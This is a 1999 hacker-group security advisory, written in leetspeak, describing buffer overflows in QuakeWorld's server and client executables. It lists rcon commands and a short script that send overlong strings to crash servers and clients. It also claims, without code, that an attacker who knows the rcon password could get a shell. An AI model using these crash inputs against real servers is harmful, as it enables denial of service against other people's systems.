======================================================-[1999-10-25 UnlG]-====
quakeworld                                                security advisory
                                                            unlimited gr0up

t0pic:          some buffer overflow in qwsv.exe and qwcl.exe
category:       buffer overflow (potential holes)
ann0unced:      1999-10-25
affects:        i think all version of quakeworld even lastest 2.33
linux 0nly:     not linux! tested on win32 platform but i believe
                this overflow presents at all versions
patches:        not yet
disc0vered:     b@$t sh()t //UnlG

=============================================================================

I.  pr0blem descripti0n
    
Hi! I very lazy and c0nsequently I will n0t write here a l0t.
I generally d0 n0t write much, i like patch, heh (patch the w0rld! ;-)
I think it is n0t s0 seri0us pr0blem, but nevertheless 
it can bring small pr0blems.

0K. 

here some examples:
d0s:
1)exec <rcon> map 1111111<a lot char here>11111
  -  crash server (simple buffer overflow)
  
2)exec <rcon> exec 1111111<a lot char here>11111
  -  crash server (simple buffer overflow)

3)exec <rcon> echo 1111111<a lot char here>11111
  -  crash server (simple buffer overflow)
  
4)exec <rcon> say 1111111<a lot char here>11111  
  -  crash server and clients (overflow but i don't know what 8-)
  -  client killed forever! ;-) (until reb00t) 
5) this little quake script will crash server
----=[cut here]=----
echo run this crap a some time (10-30)
rcon <rcon> fraglimit aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
rcon <rcon> maxclients aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
rcon <rcon> sv_maxspeed aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
rcon <rcon> deathmatch aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
rcon <rcon> timelimit aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
rcon <rcon> hostname aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
----=[cut here]=----


if you know rcon_password you can get root or users shell
(but 1 problem - exploit code is difficult)

II. S0luti0n

 the best s0luti0n - 
 c:\games\the_best\quake\del .
 and press Y
 or c0ntact with ID Software pr0grammers 


=============================================================================
unlimited gr0up

Web Site:                       http://infected.ilm.net/unlg/
c0nfidential c0ntacts:          0nly "real life" chat
n0t c0nfidential c0ntacts:      undernet or unlg@telebot.net
PGP Key:                        i hate PGP and 0ther crappy t00lz
                                XoR crypting is rule! ;-) 
Security public discussi0n:     on packetstr0m or on b1nary illusi0n
Greetz:                         all H/P/A/V scene 
                                and ID software
======================================================-[1999-10-25 UnlG]-====